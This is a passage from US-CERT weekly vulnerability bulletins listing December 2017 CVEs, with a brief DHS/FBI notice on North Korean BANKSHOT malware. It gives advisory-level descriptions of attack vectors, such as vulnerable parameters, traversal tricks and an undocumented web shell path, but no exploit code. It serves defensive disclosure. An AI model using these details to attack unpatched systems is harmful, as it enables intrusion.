 		Denial of Service (DOS) in SAP Business Objects Platform, Enterprise 4.10 and 4.20, that could allow an attacker to prevent legitimate users from accessing a service.2017-12-12not yet calculatedCVE-2017-16683
BID
CONFIRM
CONFIRM
sap -- business_warehouse_universal_data_integration
 		Cross-Site scripting (XSS) in SAP Business Warehouse Universal Data Integration, from 7.10 to 7.11, 7.20, 7.30, 7.31, 7.40, 7.50, due to insufficient encoding of user controlled inputs.2017-12-12not yet calculatedCVE-2017-16685
BID
CONFIRM
CONFIRM
sap -- hana
 		The user self-service tools of SAP HANA extended application services, classic user self-service, a part of SAP HANA Database versions 1.00 and 2.00, can be misused to enumerate valid and invalid user accounts. An unauthenticated user could use the error messages to determine if a given username is valid.2017-12-12not yet calculatedCVE-2017-16687
BID
CONFIRM
CONFIRM
sap -- hana
 		Two potential audit log injections in SAP HANA extended application services 1.0, advanced model: 1) Certain HTTP/REST endpoints of controller service are missing user input validation which could allow unprivileged attackers to forge audit log lines. Hence the interpretation of audit log files could be hindered or misdirected. 2) User Account and Authentication writes audit logs into syslog and additionally writes the same audit entries into a log file. Entries in the log file miss escaping. Hence the interpretation of audit log files could be hindered or misdirected, while the entries in syslog are correct.2017-12-12not yet calculatedCVE-2017-16680
BID
CONFIRM
CONFIRM
sap -- kernel
 		A Trusted RFC connection in SAP KERNEL 32NUC, SAP KERNEL 32Unicode, SAP KERNEL 64NUC, SAP KERNEL 64Unicode 7.21, 7.21EXT, 7.22, 7.22EXT; SAP KERNEL from 7.21 to 7.22, 7.45, 7.49, can be established to a different client or a different user on the same system, although no explicit Trusted/Trusting Relation to the same system has been defined.2017-12-12not yet calculatedCVE-2017-16689
BID
CONFIRM
CONFIRM
sap -- netweaver_internet_transaction_server
 		SAP NetWeaver Internet Transaction Server (ITS), SAP Basis from 7.00 to 7.02, 7.30, 7.31, 7.40, from 7.50 to 7.52, allows an attacker with administrator credentials to inject code that can be executed by the application and thereby control the behavior of the application.2017-12-12not yet calculatedCVE-2017-16682
BID
CONFIRM
CONFIRM
sap -- netweaver_knowledge_management_configuration_service
 		Server Side Request Forgery (SSRF) vulnerability in SAP NetWeaver Knowledge Management Configuration Service, EPBC and EPBC2 from 7.00 to 7.02; KMC-BC 7.30, 7.31, 7.40 and 7.50, that allows an attacker to manipulate the vulnerable application to send crafted requests on behalf of the application.2017-12-12not yet calculatedCVE-2017-16678
BID
CONFIRM
CONFIRM
sap -- note_assistant_tool
 		SAP Note Assistant tool (SAP BASIS from 7.00 to 7.02, from 7.10 to 7.11, 7.30, 7.31,7.40, from 7.50 to 7.52) supports upload of digitally signed note file of type 'SAR'. The digital signature verification is done together with the extraction of note file contained in the SAR archive. It is possible to append a tampered file to the SAR archive using SAPCAR tool and during the extraction, digital signature verification fails but the tampered file is extracted.2017-12-12not yet calculatedCVE-2017-16691
CONFIRM
CONFIRM
sap -- plant_connectivity
 		A malicious DLL preload attack possible on NwSapSetup and Installation self-extracting program for SAP Plant Connectivity 2.3 and 15.0. It is possible that SAPSetup / NwSapSetup.exe loads system DLLs like DWMAPI.dll (located in your Syswow64 / System32 folder) from the folder the executable is in and not from the system location. The desired behavior is that system dlls are only loaded from the system folders. If a dll with the same name as the system dll is located in the same folder as the executable, this dll is loaded and code is executed.2017-12-12not yet calculatedCVE-2017-16690
BID
CONFIRM
CONFIRM
sap -- startup_service
 		URL redirection vulnerability in SAP's Startup Service, SAP KERNEL 32 NUC, SAP KERNEL 32 Unicode, SAP KERNEL 64 NUC, SAP KERNEL 64 Unicode 7.21, 7.21EXT, 7.22 and 7.22EXT; SAP KERNEL 7.21, 7.22, 7.45, 7.49 and 7.52, that allows an attacker to redirect users to a malicious site.2017-12-12not yet calculatedCVE-2017-16679
BID
CONFIRM
CONFIRM
scummvm -- scummvm
 		backends/platform/sdl/posix/posix.cpp in ScummVM 1.9.0 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL.2017-12-14not yet calculatedCVE-2017-17528
MISC
seacms -- seacms
 		SeaCMS 6.56 allows remote authenticated administrators to execute arbitrary PHP code via a crafted token field to admin/admin_ping.php, which interacts with data/admin/ping.php.2017-12-12not yet calculatedCVE-2017-17561
MISC
MISC
sensible-utils -- sensible-utils
 		sensible-browser in sensible-utils before 0.0.11 does not validate strings before launching the program specified by the BROWSER environment variable, which allows remote attackers to conduct argument-injection attacks via a crafted URL, as demonstrated by a --proxy-pac-file argument.2017-12-11not yet calculatedCVE-2017-17512
MISC
MISC
sinology -- mailplus_server
 		Cross-site scripting (XSS) vulnerability in Disclaimer in Synology MailPlus Server before 1.4.0-0415 allows remote authenticated users to inject arbitrary web script or HTML via the NAME parameter.2017-12-15not yet calculatedCVE-2017-15890
CONFIRM
swi-prolog -- swi-prolog
 		library/www_browser.pl in SWI-Prolog 7.2.3 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL.2017-12-14not yet calculatedCVE-2017-17524
MISC
sylpheed -- sylpheed
 		libsylph/utils.c in Sylpheed through 3.6 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL.2017-12-14not yet calculatedCVE-2017-17517
MISC
symantec -- norton_family_android_app
 		Prior to 4.4.1.10, the Norton Family Android App can be susceptible to an Information Disclosure issue. Information disclosure is a very common issue that attackers will attempt to exploit as a first pass across the application. As they probe the application they will take note of anything that may seem out of place or any bit of information they can use to their advantage such as error messages, system information, user data, version numbers, component names, URL paths, or even simple typos and misspellings.2017-12-13not yet calculatedCVE-2017-15530
BID
CONFIRM
symantec -- norton_family_android_app
 		Prior to 4.4.1.10, the Norton Family Android App can be susceptible to a Denial of Service (DoS) exploit. A DoS attack is a type of attack whereby the perpetrator attempts to make a particular device unavailable to its intended user by temporarily or indefinitely disrupting services of a specific host within a network.2017-12-13not yet calculatedCVE-2017-15529
BID
CONFIRM
synaptics -- touchpad_drivers
 		A debug tool in Synaptics TouchPad drivers allows local users with administrative access to obtain sensitive information about keyboard scan codes by modifying registry keys.2017-12-15not yet calculatedCVE-2017-17556
HP
CONFIRM
MISC
techno -- portfolio_management_panel
 		Techno Portfolio Management Panel 1.0 allows an attacker to inject SQL commands via a single.php?id= request.2017-12-11not yet calculatedCVE-2017-17110
MISC
techno -- portfolio_management_panel
 		Techno - Portfolio Management Panel through 2017-11-16 allows SQL Injection via the panel/search.php s parameter.2017-12-15not yet calculatedCVE-2017-17695
MISC
techno -- portfolio_management_panel
 		Techno - Portfolio Management Panel through 2017-11-16 allows full path disclosure via an invalid s parameter to panel/search.php.2017-12-15not yet calculatedCVE-2017-17696
MISC
techno -- portfolio_management_panel
 		Techno - Portfolio Management Panel through 2017-11-16 allows XSS via the panel/search.php s parameter.2017-12-15not yet calculatedCVE-2017-17694
MISC
techno -- portfolio_management_panel
 		Techno - Portfolio Management Panel through 2017-11-16 does not check authorization for panel/portfolio.php?action=delete requests that remove feedback.2017-12-15not yet calculatedCVE-2017-17693
MISC
telegram – telegram_messenger
 		The saveFile method in MediaController.java in the Telegram Messenger application before 2017-12-08 for Android allows directory traversal via a pathname obtained in a file-transfer request from a remote peer, as demonstrated by writing to tgnet.dat or tgnet.dat.bak.2017-12-16not yet calculatedCVE-2017-17715
MISC
tex_live -- tex_live
 		TeX Live through 20170524 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL, related to linked_scripts/context/stubs/unix/mtxrun, texmf-dist/scripts/context/stubs/mswin/mtxrun.lua, and texmf-dist/tex/luatex/lualibs/lualibs-os.lua.2017-12-14not yet calculatedCVE-2017-17513
MISC
tibbr -- tibbr_community_and_tibbr_enterprise
 		The tibbr web server components of tibbr Community, and tibbr Enterprise contain SAML protocol handling errors which may allow authorized users to impersonate other users, and therefore escalate their access privileges. Affected releases are tibbr Community 5.2.1 and below; 6.0.0; 6.0.1; 7.0.0, tibbr Enterprise 5.2.1 and below; 6.0.0; 6.0.1; 7.0.0.2017-12-12not yet calculatedCVE-2017-5530
CONFIRM
tibbr -- tibbr_community_and_tibbr_enterprise
 		The tibbr user profiles components of tibbr Community, and tibbr Enterprise expose a weakness in an improperly sandboxed third-party component. Affected releases are TIBCO Software Inc. tibbr Community 5.2.1 and below; 6.0.0; 6.0.1; 7.0.0, tibbr Enterprise 5.2.1 and below; 6.0.0; 6.0.1; 7.0.0.2017-12-12not yet calculatedCVE-2017-5534
CONFIRM
tibco -- businessworks_process_monitor
 		Cross-site scripting (XSS) vulnerability in Integration Matters nJAMS 3, as used in TIBCO BusinessWorks Process Monitor through 3.0.1.3 and other products, allows remote authenticated administrators to inject arbitrary web script or HTML via the users management panel of the web interface.2017-12-10not yet calculatedCVE-2017-16789
MISC
tidy -- tidy
 		In Tidy 5.7.0, the prvTidyTidyMetaCharset function in clean.c allows attackers to cause a denial of service (Segmentation Fault), because the currentNode variable in the "children of the head" processing feature is modified in the loop without validating the new value.2017-12-10not yet calculatedCVE-2017-17497
CONFIRM
tin -- tin
 		** DISPUTED ** tools/url_handler.pl in TIN 2.4.1 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL. NOTE: a third party has reported that this is intentional behavior, because the documentation states "url_handler.pl was designed to work together with tin which only issues shell escaped absolute URLs."2017-12-14not yet calculatedCVE-2017-17520
MISC
tkabber -- tkabber
 		default.tcl in Tkabber 1.1 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL.2017-12-14not yet calculatedCVE-2017-17533
MISC
trend_micro -- encryption_for_mail
 		A service DLL preloading vulnerability in Trend Micro Encryption for Email versions 5.6 and below could allow an unauthenticated remote attacker to execute arbitrary code on a vulnerable system.2017-12-15not yet calculatedCVE-2017-11397
MISC
CONFIRM
trend_micro -- scanmail_for_exchange
 		The Log Query and Quarantine Query pages in Trend Micro ScanMail for Exchange 12.0 are vulnerable to cross site scripting (XSS) attacks.2017-12-15not yet calculatedCVE-2017-14093
CONFIRM
MISC
trend_micro -- scanmail_for_exchange
 		The absence of Anti-CSRF tokens in Trend Micro ScanMail for Exchange 12.0 web interface forms could allow an attacker to submit authenticated requests when an authenticated user browses an attacker-controlled domain.2017-12-15not yet calculatedCVE-2017-14092
CONFIRM
MISC
trend_micro -- scanmail_for_exchange
 		A vulnerability in Trend Micro ScanMail for Exchange 12.0 exists in which some communications to the update servers are not encrypted.2017-12-15not yet calculatedCVE-2017-14090
CONFIRM
MISC
trend_micro -- scanmail_for_exchange
 		A vulnerability in Trend Micro ScanMail for Exchange 12.0 exists in which certain specific installations that utilize a uncommon feature - Other Update Sources - could be exploited to overwrite sensitive files in the ScanMail for Exchange directory.2017-12-15not yet calculatedCVE-2017-14091
CONFIRM
MISC
vbulletin -- vbulletin
 		vBulletin through 5.3.x on Windows allows remote PHP code execution because a require_once call is reachable with an unauthenticated request that can include directory traversal sequences to specify an arbitrary pathname, and because ../ traversal is blocked but ..\ traversal is not blocked. For example, an attacker can make an invalid HTTP request containing PHP code, and then make an index.php?routestring= request with enough instances of ".." to reach an Apache HTTP Server log file.2017-12-13not yet calculatedCVE-2017-17671
MISC
vbulletin -- vbulletin
 		In vBulletin through 5.3.x, there is an unauthenticated deserialization vulnerability that leads to arbitrary file deletion and, under certain circumstances, code execution, because of unsafe usage of PHP's unserialize() in vB_Library_Template's cacheTemplates() function, which is a publicly exposed API. This is exploited with the templateidlist parameter to ajax/api/template/cacheTemplates.2017-12-13not yet calculatedCVE-2017-17672
MISC
videolan -- vlc_media_player
 		In VideoLAN VLC media player through 2.2.8, there is a type conversion vulnerability in modules/demux/mp4/libmp4.c in the MP4 demux module leading to a invalid free, because the type of a box may be changed between a read operation and a free operation.2017-12-15not yet calculatedCVE-2017-17670
MISC
vmware -- airwatch_console
 		VMware AirWatch Console (AWC) contains a Broken Access Control vulnerability. Successful exploitation of this issue could result in end-user device details being disclosed to an unauthorized administrator.2017-12-12not yet calculatedCVE-2017-4942
BID
SECTRACK
CONFIRM
vmware -- vasa_provider
 		Versions of VASA Provider for Clustered Data ONTAP prior to 7.0P1 contain a web server that accepts plain text authentication. This could allow an unauthenticated attacker to obtain authentication credentials.2017-12-11not yet calculatedCVE-2016-6904
CONFIRM
western_digital -- mycloud_pr4100_2.30.172_devices
 		An issue was discovered on Western Digital MyCloud PR4100 2.30.172 devices. The web administration component, /web/jquery/uploader/multi_uploadify.php, provides multipart upload functionality that is accessible without authentication and can be used to place a file anywhere on the device's file system. This allows an attacker the ability to upload a PHP shell onto the device and obtain arbitrary code execution as root.2017-12-12not yet calculatedCVE-2017-17560
MISC
MISC
white_dune -- white_dune
 		swt/motif/browser.c in White_dune (aka whitedune) 0.30.10 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL.2017-12-14not yet calculatedCVE-2017-17518
MISC
wolfssl -- wolfssl
 		wolfSSL prior to version 3.12.2 provides a weak Bleichenbacher oracle when any TLS cipher suite using RSA key exchange is negotiated. An attacker can recover the private key from a vulnerable wolfSSL application. This vulnerability is referred to as "ROBOT."2017-12-12not yet calculatedCVE-2017-13099
CERT-VN
BID
CONFIRM
MISC
xen -- xen
 		An issue was discovered in Xen through 4.9.x allowing guest OS users to cause a denial of service (host OS crash) or gain host OS privileges by leveraging an incorrect mask for reference-count overflow checking in shadow mode.2017-12-12not yet calculatedCVE-2017-17563
CONFIRM
CONFIRM
xen -- xen
 		An issue was discovered in Xen through 4.9.x allowing PV guest OS users to cause a denial of service (host OS crash) if shadow mode and log-dirty mode are in place, because of an incorrect assertion related to M2P.2017-12-12not yet calculatedCVE-2017-17565
CONFIRM
CONFIRM
xen -- xen
 		An issue was discovered in Xen through 4.9.x allowing PV guest OS users to cause a denial of service (host OS crash) or gain host OS privileges in shadow mode by mapping a certain auxiliary page.2017-12-12not yet calculatedCVE-2017-17566
CONFIRM
CONFIRM

xen -- xen
 		An issue was discovered in Xen through 4.9.x allowing guest OS users to cause a denial of service (host OS crash) or gain host OS privileges by leveraging incorrect error handling for reference counting in shadow mode.2017-12-12not yet calculatedCVE-2017-17564
CONFIRM
CONFIRM
xtuple_postbooks -- xtuple_postbooks
 		guiclient/guiclient.cpp in xTuple PostBooks 4.7.0 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL.2017-12-14not yet calculatedCVE-2017-17525
MISC
yourphpscript.com -- simple_chatting_system
 		Simple Chatting System 1.0 allows Arbitrary File Upload via view/my_profile.php, which places files under uploads/.2017-12-13not yet calculatedCVE-2017-17593
MISC
zoho -- manageengine_password_manager_pro_9
 		Zoho ManageEngine Password Manager Pro 9 before 9.4 (9400) has reflected XSS in SearchResult.ec and BulkAccessControlView.ec.2017-12-15not yet calculatedCVE-2017-17698
CONFIRM
Back to top

This product is provided subject to this Notification and this Privacy & Use policy.


North Korean Malicious Cyber Activity

December 21, 2017, 7:45 am
$
0
0
Original release date: December 21, 2017

The Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI) have identified Trojan malware variants—referred to as BANKSHOT—used by the North Korean government. The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA.

US-CERT encourages users and administrators to review Malware Analysis Report (MAR) 10135536-B and the US-CERT page on HIDDEN COBRA - North Korean Malicious Cyber Activity for more information.

This product is provided subject to this Notification and this Privacy & Use policy.


SB17-359: Vulnerability Summary for the Week of December 18, 2017

December 24, 2017, 9:27 pm
$
0
0
Original release date: December 25, 2017 | Last revised: December 26, 2017

The US-CERT Cyber Security Bulletin provides a summary of new vulnerabilities that have been recorded by the National Institute of Standards and Technology (NIST) National Vulnerability Database (NVD) in the past week. The NVD is sponsored by the Department of Homeland Security (DHS) National Cybersecurity and Communications Integration Center (NCCIC) / United States Computer Emergency Readiness Team (US-CERT). For modified or updated entries, please visit the NVD, which contains historical vulnerability information.

The vulnerabilities are based on the CVE vulnerability naming standard and are organized according to severity, determined by the Common Vulnerability Scoring System (CVSS) standard. The division of high, medium, and low severities correspond to the following scores:

  • High - Vulnerabilities will be labeled High severity if they have a CVSS base score of 7.0 - 10.0

  • Medium - Vulnerabilities will be labeled Medium severity if they have a CVSS base score of 4.0 - 6.9

  • Low - Vulnerabilities will be labeled Low severity if they have a CVSS base score of 0.0 - 3.9

Entries may include additional information provided by organizations and efforts sponsored by US-CERT. This information may include identifying information, values, definitions, and related links. Patch information is provided when available. Please note that some of the information in the bulletins is compiled from external, open source reports and is not a direct result of US-CERT analysis.

 

High Vulnerabilities

Primary
Vendor -- Product		DescriptionPublishedCVSS ScoreSource & Patch Info
k7computing -- antivirusK7Sentry.sys 15.1.0.59 in K7 Antivirus 15.1.0309 has a NULL pointer dereference via a 0x950025ac DeviceIoControl request.2017-12-157.5CVE-2017-17699
MISC
k7computing -- antivirusK7Sentry.sys 15.1.0.59 in K7 Antivirus 15.1.0309 has a NULL pointer dereference via a 0x950025a4 DeviceIoControl request.2017-12-157.5CVE-2017-17700
MISC
k7computing -- antivirusK7Sentry.sys 15.1.0.59 in K7 Antivirus 15.1.0309 has a NULL pointer dereference via a 0x950025c8 DeviceIoControl request.2017-12-157.5CVE-2017-17701
MISC
Back to top

 

Medium Vulnerabilities

Primary
Vendor -- Product		DescriptionPublishedCVSS ScoreSource & Patch Info
techno_-_portfolio_management_panel_project -- techno_-_portfolio_management_panelTechno - Portfolio Management Panel through 2017-11-16 does not check authorization for panel/portfolio.php?action=delete requests that remove feedback.2017-12-154.0CVE-2017-17693
MISC
techno_-_portfolio_management_panel_project -- techno_-_portfolio_management_panelTechno - Portfolio Management Panel through 2017-11-16 allows SQL Injection via the panel/search.php s parameter.2017-12-156.5CVE-2017-17695
MISC
techno_-_portfolio_management_panel_project -- techno_-_portfolio_management_panelTechno - Portfolio Management Panel through 2017-11-16 allows full path disclosure via an invalid s parameter to panel/search.php.2017-12-154.0CVE-2017-17696
MISC
Back to top

 

Low Vulnerabilities

Primary
Vendor -- Product		DescriptionPublishedCVSS ScoreSource & Patch Info
techno_-_portfolio_management_panel_project -- techno_-_portfolio_management_panelTechno - Portfolio Management Panel through 2017-11-16 allows XSS via the panel/search.php s parameter.2017-12-153.5CVE-2017-17694
MISC
Back to top

 

Severity Not Yet Assigned

Primary
Vendor -- Product		DescriptionPublishedCVSS ScoreSource & Patch Info
abb -- ellipse
 		An Unprotected Transport of Credentials issue was discovered in ABB Ellipse 8.3 through Ellipse 8.9 released prior to December 2017 (including Ellipse Select). A vulnerability exists in the authentication of Ellipse to LDAP/AD using the LDAP protocol. An attacker could exploit the vulnerability by sniffing local network traffic, allowing the discovery of authentication credentials.2017-12-20not yet calculatedCVE-2017-16731
MISC
apache -- drill
 		In Apache Drill 1.11.0 and earlier when submitting form from Query page users are able to pass arbitrary script or HTML which will take effect on Profile page afterwards. Example: after submitting special script that returns cookie information from Query page, malicious user may obtain this information from Profile page afterwards.2017-12-18not yet calculatedCVE-2017-12630
MLIST
apache -- sling_authentication_service
 		A flaw in the org.apache.sling.auth.core.AuthUtil#isRedirectValid method in Apache Sling Authentication Service 1.4.0 allows an attacker, through the Sling login form, to trick a victim to send over their credentials.2017-12-18not yet calculatedCVE-2017-15700
MLIST
bitdefender -- bitdefender
 		This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Bitdefender Internet Security 2018. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within emulator 0x102 in cevakrnl.xmd. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated object. An attacker can leverage this vulnerability to execute code under the context of SYSTEM. Was ZDI-CAN-5116.2017-12-21not yet calculatedCVE-2017-17410
MISC
bitdefender -- bitdefender
 		This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Bitdefender Internet Security 2018. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within emulator 0x10A in cevakrnl.xmd. The issue results from the lack of proper validation of user-supplied data, which can result in an integer overflow before writing to memory. An attacker can leverage this vulnerability to execute code under the context of SYSTEM. Was ZDI-CAN-5102.2017-12-21not yet calculatedCVE-2017-17409
MISC
bitdefender -- bitdefender
 		This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Bitdefender Internet Security 2018. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within cevakrnl.xmd. The issue results from the lack of proper validation of user-supplied data, which can result in an integer overflow before allocating a buffer. An attacker can leverage this vulnerability to execute code under the context of SYSTEM. Was ZDI-CAN-5101.2017-12-21not yet calculatedCVE-2017-17408
MISC
blogotext -- blogotext
 		validate_form_preferences in admin/preferences.php in BlogoText through 3.7.6 allows attackers to bypass intended access restrictions via vectors related to an e-mail address field.2017-12-20not yet calculatedCVE-2017-17794
CONFIRM
CONFIRM
blogotext -- blogotext
 		Cross site scripting (XSS) vulnerability in the markup_clean_href function in inc/conv.php in BlogoText through 3.7.6 allows remote attackers to inject arbitrary JavaScript via a comment.2017-12-20not yet calculatedCVE-2017-17792
CONFIRM
CONFIRM
blogotext -- blogotext
 		Information Disclosure vulnerability in creer_fichier_zip in admin/maintenance.php in BlogoText through 3.7.6 allows remote attackers to defeat a filename-randomization protection mechanism, and read backup archives on Windows servers, by providing the archiv~1.zip name (aka an 8.3 filename).2017-12-20not yet calculatedCVE-2017-17793
CONFIRM
CONFIRM
brightsign -- brightsign_digital_signage
 		The BrightSign Digital Signage (4k242) device (Firmware 6.2.63 and below) has XSS via the REF parameter to /network_diagnostics.html or /storage_info.html.2017-12-18not yet calculatedCVE-2017-17737
MISC
brightsign -- brightsign_digital_signage
 		The BrightSign Digital Signage (4k242) device (Firmware 6.2.63 and below) allows renaming and modifying files via /tools.html.2017-12-18not yet calculatedCVE-2017-17738
MISC
brightsign -- brightsign_digital_signage
 		The BrightSign Digital Signage (4k242) device (Firmware 6.2.63 and below) has directory traversal via the /storage.html rp parameter, allowing an attacker to read or write to files.2017-12-18not yet calculatedCVE-2017-17739
MISC
cambium_networks -- epmp_firmware
 		Versions 4.3.2-R4 and prior of Cambium Networks cnPilot firmware lack CSRF controls that can mitigate the effects of CSRF attacks, which are most typically implemented as randomized per-session tokens associated with any web application function, especially destructive ones.2017-12-20not yet calculatedCVE-2017-5263
MISC
cambium_networks -- epmp_firmware
 		In version 3.5 and prior of Cambium Networks ePMP firmware, an attacker who knows (or guesses) the SNMP read/write (RW) community string can insert XSS strings in certain SNMP OIDs which will execute in the context of the currently-logged on user.2017-12-20not yet calculatedCVE-2017-5257
MISC
cambium_networks -- epmp_firmware
 		In version 3.5 and prior of Cambium Networks ePMP firmware, all authenticated users have the ability to update the Device Name and System Description fields in the web administration console, and those fields are vulnerable to persistent cross-site scripting (XSS) injection.2017-12-20not yet calculatedCVE-2017-5256
MISC
cambium_networks -- epmp_firmware
 		In versions 4.3.2-R4 and prior of Cambium Networks cnPilot firmware, the 'ping' and 'traceroute' functions of the web administrative console expose a file path traversal vulnerability, accessible to all authenticated users.2017-12-20not yet calculatedCVE-2017-5261
MISC
cambium_networks -- epmp_firmware
 		In versions 4.3.2-R4 and prior of Cambium Networks cnPilot firmware, the SNMP read-only (RO) community string has access to sensitive information by OID reference.2017-12-20not yet calculatedCVE-2017-5262
MISC
cambium_networks -- epmp_firmware
 		In versions 4.3.2-R4 and prior of Cambium Networks cnPilot firmware, although the option to access the configuration file is not available in the normal web administrative console for the 'user' account, the configuration file is accessible via direct object reference (DRO) at http://<device-ip-or-hostname>/goform/down_cfg_file by this otherwise low privilege 'user' account.2017-12-20not yet calculatedCVE-2017-5260
MISC
cambium_networks -- epmp_firmware
 		In version 3.5 and prior of Cambium Networks ePMP firmware, a lack of input sanitation for certain parameters on the web management console allows any authenticated user (including the otherwise low-privilege readonly user) to inject shell meta-characters as part of a specially-crafted POST request to the get_chart function and run OS-level commands, effectively as root.2017-12-20not yet calculatedCVE-2017-5255
MISC
cambium_networks -- epmp_firmware
 		In version 3.5 and prior of Cambium Networks ePMP firmware, the non-administrative users 'installer' and 'home' have the capability of changing passwords for other accounts, including admin, after disabling a client-side protection mechanism.2017-12-20not yet calculatedCVE-2017-5254
MISC
cambium_networks -- epmp_firmware
 		In version 3.5 and prior of Cambium Networks ePMP firmware, an attacker who knows or can guess the RW community string can provide a URL for a configuration file over SNMP with XSS strings in certain SNMP OIDs, serve it via HTTP, and the affected device will perform a configuration restore using the attacker's supplied config file, including the inserted XSS strings.2017-12-20not yet calculatedCVE-2017-5258
MISC
cambium_networks -- epmp_firmware
 		In versions 4.3.2-R4 and prior of Cambium Networks cnPilot firmware, an undocumented, root-privilege administration web shell is available using the HTTP path https://<device-ip-or-hostname>/adm/syscmd.asp.2017-12-20not yet calculatedCVE-2017-5259
MISC
cisco -- asa
 		A vulnerability in the TLS protocol implementation of legacy Cisco ASA 5500 Series (ASA 5505, 5510, 5520, 5540, and 5550) devices could allow an unauthenticated, remote attacker to access sensitive information, aka a Return of Bleichenbacher's Oracle Threat (ROBOT) attack. An attacker could iteratively query a server running a vulnerable TLS stack implementation to perform cryptanalytic operations that may allow decryption of previously captured TLS sessions. Cisco Bug IDs: CSCvg97652.2017-12-15not yet calculatedCVE-2017-12373
BID
CONFIRM
cms_made_simple -- cms_made_simple 
 		CMS Made Simple (CMSMS) before 2.2.5 does not properly cache login information in cookies.2017-12-18not yet calculatedCVE-2017-17735
CONFIRM
CONFIRM
cms_made_simple -- cms_made_simple 
 		CMS Made Simple (CMSMS) before 2.2.5 does not properly cache login information in sessions.2017-12-18not yet calculatedCVE-2017-17734
CONFIRM
CONFIRM
code_crafters -- ability_mail_server
 		Ability Mail Server 3.3.2 has Cross Site Scripting (XSS) via the body of an e-mail message, with JavaScript code executed on the Read Mail screen (aka the /_readmail URI). This is fixed in version 4.2.4.2017-12-20not yet calculatedCVE-2017-17752
EXPLOIT-DB
conarc -- ichannel
 		Conarc iChannel allows remote attackers to obtain sensitive information, modify the configuration, or cause a denial of service (by deleting the configuration) via a wc.dll?wwMaint~EditConfig request (which reaches an older version of a West Wind Web Connection HTTP service).2017-12-19not yet calculatedCVE-2017-17759
MISC
dedecms -- dedecms
 		DedeCMS through 5.7 has SQL Injection via the $_FILES superglobal to plus/recommend.php.2017-12-18not yet calculatedCVE-2017-17731
MISC
dedecms -- dedecms
 		DedeCMS through 5.6 allows arbitrary file upload and PHP code execution by embedding the PHP code in a .jpg file, which is used in the templet parameter to member/article_edit.php.2017-12-18not yet calculatedCVE-2017-17727
MISC
dedecms -- dedecms
 		DedeCMS through 5.7 has SQL Injection via the logo parameter to plus/flink_add.php.2017-12-18not yet calculatedCVE-2017-17730
MISC
ecava -- integraxor
 		A SQL Injection issue was discovered in Ecava IntegraXor v 6.1.1030.1 and prior. The SQL Injection vulnerability has been identified, which generates an error in the database log.2017-12-20not yet calculatedCVE-2017-16735
MISC
ecava -- integraxor
 		A SQL Injection issue was discovered in Ecava IntegraXor v 6.1.1030.1 and prior. The SQL Injection vulnerability has been identified, which an attacker can leverage to disclose sensitive information from the database.2017-12-20not yet calculatedCVE-2017-16733
MISC
emc -- data_domain
 		An issue was discovered in EMC Data Domain DD OS 5.7 family, versions prior to 5.7.5.6; EMC Data Domain DD OS 6.0 family, versions prior to 6.0.2.9; EMC Data Domain DD OS 6.1 family, versions prior to 6.1.0.21; EMC Data Domain Virtual Edition 2.0 family, all versions; EMC Data Domain Virtual Edition 3.0 family, versions prior to 3.0 SP2 Update 1; and EMC Data Domain Virtual Edition 3.1 family, versions prior to 3.1 Update 2. EMC Data Domain DD OS contains a memory overflow vulnerability in SMBv1 which may potentially be exploited by an unauthenticated remote attacker. An attacker may completely shut down both the SMB service and active directory authentication. This may also allow remote code injection and execution.2017-12-20not yet calculatedCVE-2017-14385
CONFIRM
SECTRACK
emc -- isilon_onfs
 		The NFS service in EMC Isilon OneFS 8.1.0.0, 8.0.1.0 - 8.0.1.1, and 8.0.0.0 - 8.0.0.4 maintains default NFS export settings (including the NFS export security flavor for authentication) that can be leveraged by current and future NFS exports. This NFS service contained a flaw that did not properly propagate changes made to the default security flavor to all new and existing NFS exports that are configured to use default NFS export settings and that are mounted after those changes are made. This flaw may potentially allow NFS clients to access affected NFS exports using the default and potentially weaker security flavor even if a more secure one was selected to be used by the OneFS administrator, aka an "NFS Export Security Setting Fallback Vulnerability."2017-12-20not yet calculatedCVE-2017-14387
CONFIRM
f5 -- big-ip_afm
 		A SQL injection vulnerability exists in the BIG-IP AFM management UI on versions 12.0.0, 12.1.0, 12.1.1, 12.1.2 and 13.0.0 that may allow a copy of the firewall rules to be tampered with and impact the Configuration Utility until there is a resync of the rules. Traffic processing and the live firewall rules in use are not affected.2017-12-21not yet calculatedCVE-2017-0304
SECTRACK
CONFIRM
f5 -- big-ip_apm
 		In F5 BIG-IP APM software version 13.0.0 and 12.1.2, in some circumstances, APM tunneled VPN flows can cause a VPN/PPP connflow to be prematurely freed or cause TMM to stop responding with a "flow not in use" assertion. An attacker may be able to disrupt traffic or cause the BIG-IP system to fail over to another device in the device group.2017-12-21not yet calculatedCVE-2017-6129
CONFIRM
f5 -- big-ip_apm
 		In F5 BIG-IP APM software versions 11.5.0, 11.5.1, 11.5.2, 11.5.3, 11.5.4, 11.6.0, 11.6.1, 12.0.0, 12.1.0, 12.1.1 and 12.1.2 BIG-IP APM portal access requests do not return the intended resources in some cases. This may allow access to internal BIG-IP APM resources, however the application resources and backend servers are unaffected.2017-12-21not yet calculatedCVE-2017-0301
SECTRACK
CONFIRM
f5 -- big-ip_apm
